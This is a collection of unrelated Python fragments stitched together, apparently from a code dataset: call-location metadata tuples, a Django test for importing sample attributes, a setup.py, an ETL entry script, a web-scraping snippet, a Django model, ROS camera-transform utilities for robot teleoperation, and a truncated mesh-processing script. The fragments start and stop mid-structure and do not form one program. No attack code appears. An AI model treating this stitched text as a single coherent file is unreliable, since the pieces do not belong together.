serverprint\n'), ((5782, 5817), 'control.utils.pick', 'G', (['ASSESSED_RANK', 'aStage'], {'default': '(0)'}), '(ASSESSED_RANK, aStage, default=0)\n', (5783, 5817), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7538, 7563), 'control.table.Table', 'Table', (['context', 'N.contrib'], {}), '(context, N.contrib)\n', (7543, 7563), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((7644, 7662), 'control.utils.pick', 'G', (['record', 'N.title'], {}), '(record, N.title)\n', (7645, 7662), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7687, 7703), 'control.utils.pick', 'G', (['record', 'N._id'], {}), '(record, N._id)\n', (7688, 7703), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7728, 7749), 'control.utils.pick', 'G', (['record', 'N.selected'], {}), 
'(record, N.selected)\n', (7729, 7749), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7771, 7790), 'control.utils.pick', 'G', (['record', 'N.aStage'], {}), '(record, N.aStage)\n', (7772, 7790), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7813, 7833), 'control.utils.pick', 'G', (['record', 'N.r2Stage'], {}), '(record, N.r2Stage)\n', (7814, 7833), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7947, 7965), 'control.utils.pick', 'G', (['record', 'N.score'], {}), '(record, N.score)\n', (7948, 7965), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8908, 8928), 'control.utils.pick', 'G', (['record', 'N.r1Stage'], {}), '(record, N.r1Stage)\n', (8909, 8928), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9655, 9689), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r1Stage'], {'default': '(0)'}), '(REVIEW_RANK, r1Stage, default=0)\n', (9656, 9689), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9711, 9745), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r2Stage'], {'default': '(0)'}), '(REVIEW_RANK, r2Stage, default=0)\n', (9712, 9745), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3813, 3824), 'control.utils.mjson', 'mjson', (['None'], {}), '(None)\n', (3818, 3824), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4097, 4118), 'control.table.Table', 'Table', (['context', 'table'], {}), '(context, table)\n', (4102, 4118), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((4309, 4320), 'control.utils.mjson', 'mjson', (['data'], {}), '(data)\n', (4314, 4320), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4343, 4354), 'control.utils.mktsv', 'mktsv', (['data'], {}), '(data)\n', (4348, 4354), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6614, 6636), 
'control.utils.pick', 'G', (['workflow', 'N.r2Stage'], {}), '(workflow, N.r2Stage)\n', (6615, 6636), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7433, 7444), 'control.utils.pick', 'G', (['r', 'N._id'], {}), '(r, N._id)\n', (7434, 7444), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8037, 8072), 'control.utils.pick', 'G', (['ASSESSED_RANK', 'aStage'], {'default': '(0)'}), '(ASSESSED_RANK, aStage, default=0)\n', (8038, 8072), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8234, 8254), 'control.utils.pick', 'G', (['record', 'N.country'], {}), '(record, N.country)\n', (8235, 8254), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8334, 8351), 'control.utils.pick', 'G', (['record', 'N.year'], {}), '(record, N.year)\n', (8335, 8351), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8447, 8464), 'control.utils.pick', 'G', (['record', 'N.type'], {}), '(record, N.type)\n', (8448, 8464), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9495, 9515), 'control.utils.pick', 'G', (['record', 'N.r2Stage'], {}), '(record, N.r2Stage)\n', (9496, 9515), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10137, 10167), 'control.utils.pick', 'G', (['contribsFull', 'contribId', '{}'], {}), '(contribsFull, contribId, {})\n', (10138, 10167), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10288, 10310), 'control.utils.pick', 'G', (['full', 'N.dateDecided'], {}), '(full, N.dateDecided)\n', (10289, 10310), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10339, 10353), 'control.utils.pick', 'G', (['full', 'N.vcc'], {}), '(full, N.vcc)\n', (10340, 10353), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10390, 10412), 'control.utils.pick', 'G', (['full', 'N.description'], {}), '(full, N.description)\n', 
(10391, 10412), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10455, 10483), 'control.utils.pick', 'G', (['full', 'N.contactPersonName'], {}), '(full, N.contactPersonName)\n', (10456, 10483), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10527, 10556), 'control.utils.pick', 'G', (['full', 'N.contactPersonEmail'], {}), '(full, N.contactPersonEmail)\n', (10528, 10556), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10597, 10623), 'control.utils.pick', 'G', (['full', 'N.urlContribution'], {}), '(full, N.urlContribution)\n', (10598, 10623), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10660, 10682), 'control.utils.pick', 'G', (['full', 'N.urlAcademic'], {}), '(full, N.urlAcademic)\n', (10661, 10682), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10721, 10745), 'control.utils.pick', 'G', (['full', 'N.tadirahObject'], {}), '(full, N.tadirahObject)\n', (10722, 10745), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10786, 10812), 'control.utils.pick', 'G', (['full', 'N.tadirahActivity'], {}), '(full, N.tadirahActivity)\n', (10787, 10812), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10854, 10881), 'control.utils.pick', 'G', (['full', 'N.tadirahTechnique'], {}), '(full, N.tadirahTechnique)\n', (10855, 10881), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10914, 10932), 'control.utils.pick', 'G', (['full', 'N.keyword'], {}), '(full, N.keyword)\n', (10915, 10932), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10968, 10989), 'control.utils.pick', 'G', (['full', 'N.discipline'], {}), '(full, N.discipline)\n', (10969, 10989), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n')] |
from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models import (
Contribution,
Experiment,
ExperimentSampleAssociation,
OntologyTerm,
Sample,
SampleAttribute,
)
from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import (
Command,
import_metadata,
import_sample_attributes,
)
TEST_METADATA = "/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"
class ImportExternalSampleAttributesTestCase(TestCase):
def setUp(self):
experiment = Experiment()
experiment.accession_code = "GSE000"
experiment.alternate_accession_code = "E-GEOD-000"
experiment.title = "NONONONO"
experiment.description = "Boooooourns. Wasabi."
experiment.technology = "RNA-SEQ"
experiment.save()
self.experiment = experiment
# Create some samples to attach metadata to
sample = Sample()
sample.accession_code = "SRR123"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
sample2 = Sample()
sample2.accession_code = "SRR456"
sample2.technology = "RNA-SEQ"
sample2.source_database = "SRA"
sample2.title = "Not important"
sample2.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample2
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
# Create the ontology terms I'm using in the tests
name = OntologyTerm()
name.ontology_term = "PATO:0000122"
name.human_readable_name = "length"
name.save()
unit = OntologyTerm()
unit.ontology_term = "UO:0010012"
unit.human_readable_name = "thou"
unit.save()
contribution = Contribution()
contribution.source_name = "refinebio_tests"
contribution.methods_url = "ccdatalab.org"
contribution.save()
self.contribution = contribution
#
# Test import_sample_attributes()
#
def test_skip_unknown_sample(self):
"""Make sure that if someone has metadata for a sample that we haven't
surveyed then we just do nothing"""
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR789", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 0)
def test_import_invalid_ontology_term(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "thou"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
METADATA = [{"length": {"value": 25, "unit": "UO:0010012"}}]
self.assertRaises(
ValueError, import_sample_attributes, "SRR123", METADATA, self.contribution
)
def test_import_valid_sample_attributes(self):
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR123", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# Test import_metadata()
#
def test_import_valid_metadata(self):
METADATA = [
{
"sample_accession": "SRR123",
"attributes": [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}],
}
]
import_metadata(METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = Sample.objects.get(accession_code="SRR123").contributed_metadata
self.assertEqual(
contributed_metadata[self.contribution.source_name]["length"],
{"unit": "thou", "value": 25},
)
#
# End-to-end test
#
@vcr.use_cassette("/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml")
def test_management_command(self):
sample = Sample()
sample.accession_code = "DRR001173"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
command = Command()
SOURCE_NAME = "refinebio_tests"
command.handle(file=TEST_METADATA, source_name=SOURCE_NAME, methods_url="ccdatalab.org")
self.assertEqual(SampleAttribute.objects.all().count(), 1)
contributed_metadata = sample.contributed_metadata
self.assertEqual(
set(contributed_metadata[SOURCE_NAME]["biological sex"].keys()),
{"value", "confidence"},
)
self.assertEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["value"].human_readable_name,
"female",
)
self.assertAlmostEqual(
contributed_metadata[SOURCE_NAME]["biological sex"]["confidence"], 0.7856624891880539
)
| [
"data_refinery_common.models.OntologyTerm",
"data_refinery_common.models.SampleAttribute.objects.all",
"vcr.use_cassette",
"data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes",
"data_refinery_foreman.foreman.management.commands.import_external_sample... | [((4472, 4575), 'vcr.use_cassette', 'vcr.use_cassette', (['"""/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml"""'], {}), "(\n '/home/user/data_store/cassettes/foreman.sample_attributes.end-to-end.yaml'\n )\n", (4488, 4575), False, 'import vcr\n'), ((599, 611), 'data_refinery_common.models.Experiment', 'Experiment', ([], {}), '()\n', (609, 611), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((985, 993), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (991, 993), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1214, 1243), 'data_refinery_common.models.ExperimentSampleAssociation', 'ExperimentSampleAssociation', ([], {}), '()\n', (1241, 1243), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1424, 1432), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (1430, 1432), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1658, 1687), 'data_refinery_common.models.ExperimentSampleAssociation', 'ExperimentSampleAssociation', ([], {}), '()\n', (1685, 1687), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((1925, 1939), 'data_refinery_common.models.OntologyTerm', 'OntologyTerm', ([], {}), '()\n', (1937, 1939), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2064, 2078), 'data_refinery_common.models.OntologyTerm', 'OntologyTerm', ([], {}), '()\n', (2076, 
2078), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2207, 2221), 'data_refinery_common.models.Contribution', 'Contribution', ([], {}), '()\n', (2219, 2221), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2694, 2757), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes', 'import_sample_attributes', (['"""SRR789"""', 'METADATA', 'self.contribution'], {}), "('SRR789', METADATA, self.contribution)\n", (2718, 2757), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((3399, 3462), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_sample_attributes', 'import_sample_attributes', (['"""SRR123"""', 'METADATA', 'self.contribution'], {}), "('SRR123', METADATA, self.contribution)\n", (3423, 3462), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((4068, 4112), 'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.import_metadata', 'import_metadata', (['METADATA', 'self.contribution'], {}), '(METADATA, self.contribution)\n', (4083, 4112), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((4622, 4630), 'data_refinery_common.models.Sample', 'Sample', ([], {}), '()\n', (4628, 4630), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4832, 4841), 
'data_refinery_foreman.foreman.management.commands.import_external_sample_attributes.Command', 'Command', ([], {}), '()\n', (4839, 4841), False, 'from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import Command, import_metadata, import_sample_attributes\n'), ((3563, 3606), 'data_refinery_common.models.Sample.objects.get', 'Sample.objects.get', ([], {'accession_code': '"""SRR123"""'}), "(accession_code='SRR123')\n", (3581, 3606), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4213, 4256), 'data_refinery_common.models.Sample.objects.get', 'Sample.objects.get', ([], {'accession_code': '"""SRR123"""'}), "(accession_code='SRR123')\n", (4231, 4256), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((2783, 2812), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (2810, 2812), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((3489, 3518), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (3516, 3518), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((4139, 4168), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (4166, 4168), False, 'from data_refinery_common.models import Contribution, Experiment, ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n'), ((5005, 5034), 'data_refinery_common.models.SampleAttribute.objects.all', 'SampleAttribute.objects.all', ([], {}), '()\n', (5032, 5034), False, 'from data_refinery_common.models import Contribution, Experiment, 
ExperimentSampleAssociation, OntologyTerm, Sample, SampleAttribute\n')] |
from setuptools import setup, find_packages
setup(
name='simplexapiclient',
version='0.0.1',
url='https://github.com/IngoKl/simple-xapi-client.git',
author='<NAME>',
author_email='<EMAIL>',
description='A minimalistic xAPI client written in Python',
packages=find_packages(),
install_requires=['requests', 'pytest'],
) | [
"setuptools.find_packages"
] | [((288, 303), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (301, 303), False, 'from setuptools import setup, find_packages\n')] |
"""File of parameters to be used throughout the notebook."""
import os
# # # # # #
### Ch15
# # # # # #
###
N_STEPS = 50
### saving stuff
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "rnn"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID) | [
"os.path.join"
] | [((197, 249), 'os.path.join', 'os.path.join', (['PROJECT_ROOT_DIR', '"""images"""', 'CHAPTER_ID'], {}), "(PROJECT_ROOT_DIR, 'images', CHAPTER_ID)\n", (209, 249), False, 'import os\n')] |
import sys
from etl.entities_registry import get_spark_job_by_entity_name
def main(argv):
"""
Calls the needed job according to the entity
:param list argv: the list elements should be:
[1]: Entity name
[2:]: Rest of parameters (the paths to the parquet files needed for the job).
Last parameter is always the output path
"""
entity_name = argv[1]
args_without_entity = argv[0:1] + argv[2:]
job_method = get_spark_job_by_entity_name(entity_name)
job_method(args_without_entity)
if __name__ == "__main__":
sys.exit(main(sys.argv))
| [
"etl.entities_registry.get_spark_job_by_entity_name"
] | [((496, 537), 'etl.entities_registry.get_spark_job_by_entity_name', 'get_spark_job_by_entity_name', (['entity_name'], {}), '(entity_name)\n', (524, 537), False, 'from etl.entities_registry import get_spark_job_by_entity_name\n')] |
#! /usr/bin/env python3.6
from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
try:
html = urlopen("https://en.wikipedia.org/wiki/Kevin_Bacon")
except HTTPError as e:
print(e)
bs_obj = BeautifulSoup(html, "html.parser")
for link in bs_obj.findAll("a"):
print(f"link = {link}")
print(f"link.attrs = {link.attrs}")
if('href' in link.attrs):
print(link['href'])
print("--------------")
| [
"bs4.BeautifulSoup",
"urllib.request.urlopen"
] | [((243, 277), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (256, 277), False, 'from bs4 import BeautifulSoup\n'), ((144, 196), 'urllib.request.urlopen', 'urlopen', (['"""https://en.wikipedia.org/wiki/Kevin_Bacon"""'], {}), "('https://en.wikipedia.org/wiki/Kevin_Bacon')\n", (151, 196), False, 'from urllib.request import urlopen\n')] |
from django.db.models import CharField, ManyToManyField
from django.utils.translation import gettext_lazy as _
from app.utils.models import BaseModel
from app.users.models import User
class Enterprise(BaseModel):
name = CharField(_("Name of Enterprise"), max_length=255)
members = ManyToManyField(User, through="UserEnterprise", related_name="enterprises")
| [
"django.utils.translation.gettext_lazy",
"django.db.models.ManyToManyField"
] | [((291, 366), 'django.db.models.ManyToManyField', 'ManyToManyField', (['User'], {'through': '"""UserEnterprise"""', 'related_name': '"""enterprises"""'}), "(User, through='UserEnterprise', related_name='enterprises')\n", (306, 366), False, 'from django.db.models import CharField, ManyToManyField\n'), ((236, 259), 'django.utils.translation.gettext_lazy', '_', (['"""Name of Enterprise"""'], {}), "('Name of Enterprise')\n", (237, 259), True, 'from django.utils.translation import gettext_lazy as _\n')] |
#! /usr/bin/env python
import rospy
import math
from pprint import pprint
from access_teleop_msgs.msg import DeltaPX, PX, PXAndTheta, Theta
from image_geometry import PinholeCameraModel
from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3
from std_msgs.msg import Header, ColorRGBA
from visualization_msgs.msg import InteractiveMarker, InteractiveMarkerControl, InteractiveMarkerFeedback
from visualization_msgs.msg import Marker
import camera_info_messages
# Created by Tim and modified by Xinyi
# Static CameraInfo message published for each virtual camera, keyed by frame name.
camera_info_mapping = {'camera1': camera_info_messages.camera1, 'camera2': camera_info_messages.camera2, 'camera3': camera_info_messages.camera3}
# Xinyi modified: Change the camera angle for limb manipulation
# (previous camera placement kept for reference)
# transform_broadcaster_mapping = {
# 'camera1': ((0.7, 0, 2.3), (-0.70711, -0.70711, 0, 0), rospy.Time(10), 'camera1', 'base_link'),
# 'camera2': ((0.9, -1.2, 0.8), (-0.70711, 0, 0, 0.70711), rospy.Time(10), 'camera2', 'base_link'),
# 'camera3': ((1.7, -0.1, 0.8), (0.5, 0.5, -0.5, -0.5), rospy.Time(10), 'camera3', 'base_link')
# }
# Per-camera tf arguments, keyed by frame name.  Each value is
# (translation, rotation quaternion (x, y, z, w), timestamp, child_frame, parent_frame)
# -- exactly the positional signature of TransformBroadcaster.sendTransform.
transform_broadcaster_mapping = {
    'camera1': ((0.7, 0, 2.0), (-0.70711, -0.70711, 0, 0), rospy.Time(10), 'camera1', 'base_link'), # top
    'camera2': ((0.7, -1.2, 0.8), (-0.70711, 0, 0, 0.70711), rospy.Time(10), 'camera2', 'base_link'), # left
    'camera3': ((1.5, 0, 0.8), (0.5, 0.5, -0.5, -0.5), rospy.Time(10), 'camera3', 'base_link') # front
}
# Per-camera axis index and sign for orientation control.
# NOTE(review): exact semantics are not visible in this file -- confirm
# against the node that consumes these mappings.
orientation_mapping = {'camera1': 2, 'camera2': 1, 'camera3': 1}
orientation_sign_mapping = {'camera1': -1, 'camera2': 1, 'camera3': 1}
camera_names = ['camera1', 'camera2', 'camera3']
# MoveIt planning group for the PR2 arm being teleoperated.
pr2_move_group_name = "right_arm"
def wait_for_time():
    """Block until ROS time has started ticking.

    Under simulation with /use_sim_time set, rospy time reports zero until
    the first /clock message arrives; publishing before that would stamp
    messages with an invalid time.
    """
    # rospy.Time.now() is a static method; no need to allocate a throwaway
    # Time instance on every poll as the original did.
    while rospy.Time.now().to_sec() == 0:
        pass
def quat_array_to_quat(quat_array):
    """Convert a 4-element sequence into a geometry_msgs/Quaternion.

    Args:
        quat_array: indexable of length 4 in (x, y, z, w) order.

    Returns:
        Quaternion message populated from the sequence.
    """
    # ROS message constructors accept positional arguments in declared field
    # order (x, y, z, w), so the four field-by-field assignments collapse
    # into a single call.
    return Quaternion(*quat_array)
def publish_camera_transforms(tb):
    """Broadcast the base_link -> camera transform for every camera.

    Args:
        tb: a tf.TransformBroadcaster (anything exposing sendTransform()).
    """
    # Each mapping value is already ordered (translation, rotation, time,
    # child_frame, parent_frame) -- exactly sendTransform's signature -- so
    # iterate the values directly instead of indexing the dict by key.
    for transform_data in transform_broadcaster_mapping.values():
        tb.sendTransform(*transform_data)
def publish_camera_transforms_debug(tb, pub):
    """Broadcast every camera transform and visualize each camera pose.

    Debug variant of publish_camera_transforms: in addition to the tf
    broadcast, a TEXT_VIEW_FACING marker labeled with the camera frame
    name is published at each camera's pose.

    Args:
        tb: a tf.TransformBroadcaster.
        pub: rospy Publisher for visualization_msgs/Marker.
    """
    # enumerate() supplies a unique marker id per camera; the original kept
    # a manual counter named `id`, shadowing the builtin.
    for marker_id, transform_data in enumerate(transform_broadcaster_mapping.values()):
        (trans, rot, stamp, child_frame, parent_frame) = transform_data
        tb.sendTransform(trans, rot, stamp, child_frame, parent_frame)
        # Xinyi modified for debug: visualize camera poses
        marker = Marker(
            type=Marker.TEXT_VIEW_FACING,
            id=marker_id,
            pose=Pose(Point(trans[0], trans[1], trans[2]),
                      Quaternion(rot[0], rot[1], rot[2], rot[3])),
            scale=Vector3(0.06, 0.06, 0.06),
            header=Header(frame_id='base_link'),
            color=ColorRGBA(0.0, 1.0, 0.0, 0.8),
            text=child_frame)
        pub.publish(marker)
def publish_camera_info(publishers):
    """Publish the static CameraInfo message for every camera.

    Args:
        publishers: iterable of (camera_name, rospy.Publisher) pairs.
    """
    for camera_name, publisher in publishers:
        publisher.publish(camera_info_mapping[camera_name])
def publish_gripper_pixels(camera_model, move_group, pub):
data_array = []
ps = move_group.get_current_pose()
for camera in camera_names:
camera_model.fromCameraInfo(camera_info_mapping[camera])
x, y, z = getCameraDistances(camera, ps)
(u, v) = camera_model.project3dToPixel((x, y, z))
data_array.append([camera, int(u), int(v)])
for array in data_array:
px_msg = PX()
px_msg.camera_name = array[0]
px_msg.pixel_x = array[1]
px_msg.pixel_y = array[2]
pub.publish(px_msg)
def getCameraDistances(camera_name, ps):
if camera_name == "camera1":
camera_location = transform_broadcaster_mapping["camera1"][0]
z = camera_location[2] - ps.pose.position.z
x = ps.pose.position.x - camera_location[0]
y = camera_location[1] - ps.pose.position.y
elif camera_name == "camera2":
camera_location = transform_broadcaster_mapping["camera2"][0]
z = camera_location[1] - ps.pose.position.y
x = camera_location[0] - ps.pose.position.x
y = camera_location[2] - ps.pose.position.z
elif camera_name == "camera3":
camera_location = transform_broadcaster_mapping["camera3"][0]
z = camera_location[1] - ps.pose.position.y
x = camera_location[0] - ps.pose.position.x
y = camera_location[2] - ps.pose.position.z
else:
raise ValueError('Did not pass in a valid camera_name')
return x,y,z
def dpx_to_distance(dx, dy, camera_name, current_ps, offset):
big_z_mappings = {'camera1': transform_broadcaster_mapping['camera1'][0][2] - current_ps.pose.position.z, # x-y plane
'camera2': transform_broadcaster_mapping['camera2'][0][1] - current_ps.pose.position.y, # x-z plane
'camera3': transform_broadcaster_mapping['camera3'][0][0] - current_ps.pose.position.x} # y-z plane
camera_model = PinholeCameraModel()
camera_model.fromCameraInfo(camera_info_mapping[camera_name])
x, y, z = camera_model.projectPixelTo3dRay((dx, dy))
x_center, y_center, z_center = camera_model.projectPixelTo3dRay((0, 0))
big_z = abs(big_z_mappings[camera_name])
big_x = (x / z) * big_z # Use law of similar trianges to solve
big_y = (y / z) * big_z
big_x_center = (x_center / z_center) * big_z
big_y_center = (y_center / z_center) * big_z
if offset:
return big_x - big_x_center, big_y - big_y_center
else:
return big_x, big_y
def delta_modified_stamped_pose(x_distance, y_distance, camera_name, original_pose_stamped):
modified_ps = original_pose_stamped
if camera_name == 'camera1':
modified_ps.pose.position.x += x_distance # These directions came from looking at the cameras in rviz
modified_ps.pose.position.y -= y_distance
elif camera_name == 'camera2':
modified_ps.pose.position.x += x_distance
modified_ps.pose.position.z -= y_distance
elif camera_name == 'camera3':
modified_ps.pose.position.y += x_distance
modified_ps.pose.position.z -= y_distance
else:
raise ValueError('Did not pass in a valid camera_name')
return modified_ps
| [
"geometry_msgs.msg.Vector3",
"image_geometry.PinholeCameraModel",
"std_msgs.msg.ColorRGBA",
"access_teleop_msgs.msg.PX",
"geometry_msgs.msg.Quaternion",
"rospy.Time",
"geometry_msgs.msg.Point",
"std_msgs.msg.Header"
] | [((1886, 1898), 'geometry_msgs.msg.Quaternion', 'Quaternion', ([], {}), '()\n', (1896, 1898), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((5257, 5277), 'image_geometry.PinholeCameraModel', 'PinholeCameraModel', ([], {}), '()\n', (5275, 5277), False, 'from image_geometry import PinholeCameraModel\n'), ((1199, 1213), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1209, 1213), False, 'import rospy\n'), ((1314, 1328), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1324, 1328), False, 'import rospy\n'), ((1422, 1436), 'rospy.Time', 'rospy.Time', (['(10)'], {}), '(10)\n', (1432, 1436), False, 'import rospy\n'), ((3753, 3757), 'access_teleop_msgs.msg.PX', 'PX', ([], {}), '()\n', (3755, 3757), False, 'from access_teleop_msgs.msg import DeltaPX, PX, PXAndTheta, Theta\n'), ((2993, 3018), 'geometry_msgs.msg.Vector3', 'Vector3', (['(0.06)', '(0.06)', '(0.06)'], {}), '(0.06, 0.06, 0.06)\n', (3000, 3018), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((3043, 3071), 'std_msgs.msg.Header', 'Header', ([], {'frame_id': '"""base_link"""'}), "(frame_id='base_link')\n", (3049, 3071), False, 'from std_msgs.msg import Header, ColorRGBA\n'), ((3095, 3124), 'std_msgs.msg.ColorRGBA', 'ColorRGBA', (['(0.0)', '(1.0)', '(0.0)', '(0.8)'], {}), '(0.0, 1.0, 0.0, 0.8)\n', (3104, 3124), False, 'from std_msgs.msg import Header, ColorRGBA\n'), ((2770, 2841), 'geometry_msgs.msg.Point', 'Point', (['transform_data[0][0]', 'transform_data[0][1]', 'transform_data[0][2]'], {}), '(transform_data[0][0], transform_data[0][1], transform_data[0][2])\n', (2775, 2841), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((2870, 2972), 'geometry_msgs.msg.Quaternion', 'Quaternion', (['transform_data[1][0]', 'transform_data[1][1]', 'transform_data[1][2]', 'transform_data[1][3]'], {}), '(transform_data[1][0], transform_data[1][1], transform_data[1][2],\n 
transform_data[1][3])\n', (2880, 2972), False, 'from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3\n'), ((1786, 1798), 'rospy.Time', 'rospy.Time', ([], {}), '()\n', (1796, 1798), False, 'import rospy\n')] |
import numpy as np
import torch
import torch.nn.functional as F
import skimage.measure as sk
import time
import pyrender
import pymesh
import trimesh
from pyemd import emd_samples
import chamfer_python
import binvox_rw
from glob import glob
D2R = np.pi/180.0
voxsize = 32
sample_size = 2048
def RotatePhi(phi):
return np.array([[1, 0, 0, 0],
[0, np.cos(D2R*phi), np.sin(D2R*phi), 0],
[0, -np.sin(D2R*phi), np.cos(D2R*phi), 0],
[0, 0, 0, 1]])
def RotateAzimuth(phi):
return np.array([[np.cos(D2R*phi), np.sin(D2R*phi), 0, 0],
[-np.sin(D2R*phi), np.cos(D2R*phi), 0, 0],
[0, 0, 1, 0],
